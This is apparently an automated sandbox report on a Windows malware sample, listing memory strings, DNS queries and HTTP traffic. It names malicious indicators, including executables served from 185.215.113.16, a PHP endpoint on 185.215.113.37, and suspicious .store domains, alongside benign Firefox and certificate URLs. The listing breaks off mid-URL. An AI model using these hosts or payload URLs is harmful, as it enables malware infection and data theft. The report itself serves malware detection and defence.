Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://search-extensions/wikipedia/*://vast.adsafeprotected.com/vast**://securepubads.g.doubleclick.net/gampad/*ad**://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/jsvid?**://*.adsafeprotected.com/jload?*--autocomplete-popup-separator-color--panel-banner-item-info-icon-bgcolor*://ads.stickyadstv.com/auto-user-sync*blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3114655458.000002550A388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3114655458.000002550A3D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168803607.0000223F7B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3168803607.0000223F7B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3170995539.000030CEEEC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3114655458.000002550A388000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2982586081.000002550A0B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 17:29:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOKjwCSR4mjz0Cf%2BvpqkNSt965QfiNxc17RVaN%2BgJasLsT7l3WmrKDMxS0Ys%2F2Z1JCbhWL%2F4Inki6%2BUNfICyQ2mBmYfiHyuFDwylFRogBPS7oZCk%2FW7EMSaN5B2CqxU5GEaTqA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7bb0036a15e5b9-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 17:30:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bndsLghJ18YtXlo1jzfKzFZrLpXdYFEGx2gxKRtsvLiyx5uMtJ%2BrVK44bNkQqzkBQAfohx6N6Qz5UfESc4bHkbRvuTG53E8fjZKfonoWb8co9mjAr3av%2FTF5OKaDrnyhO1HGxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7bb1974ffe4802-DFW
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 00000010.00000002.2952650199.000000000101F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3009719972.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exePmS
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeoP
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3009719972.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe3AU
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeakm#
Source: file.exe, 00000000.00000003.2283865897.0000000000D61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/s7
Source: file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3009719972.0000000001480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2282756998.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2283739354.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000169D000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.0000000001698000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Data
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000169D000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.0000000001683000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.0000000001683000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#R
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.00000000016B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe)
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.00000000016B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy(OJ
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357660473.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000169D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A818000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3053862003.0000025507C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3107641537.00000255097F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000003.2951016837.000002550ACF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3090601585.0000025508D5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3134271614.000002550E99E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3136304541.0000025510095000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_CONNECTION_CREATEDorigin-controls-qua
Source: firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3090601585.0000025508DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.3120468368.000002550AAD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3040219505.0000025505EC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3042197775.000002550741D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001B.00000002.3146705531.0000025578203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3109890652.0000025509903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2983800747.000002550966C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsthis.redux
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A21B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A27A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 0000001B.00000002.3120468368.000002550AAD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3138467915.0000025510299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3136304541.000002551007B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A818000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3052236450.0000025507B37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2948670458.00000255100FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3119712014.000002550A994000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3052236450.0000025507B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3084114764.0000025508676000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3138467915.00000255102A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3123492561.000002550B067000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3125528120.000002550BADA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3123492561.000002550B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2974971166.00000255102A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3136304541.00000255100A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3084114764.000002550868A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2929130101.000002551029D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3123492561.000002550B0DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3138012152.0000025510103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3123492561.000002550B021000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2974971166.0000025510299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2168419842.000000000583D000.00000004.00000800.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2818101315.0000000005D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3112720625.000002550A052000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001B.00000002.3134271614.000002550E9D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001B.00000002.3134271614.000002550E9D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.0000025508530000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3096434663.00000255093AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowe
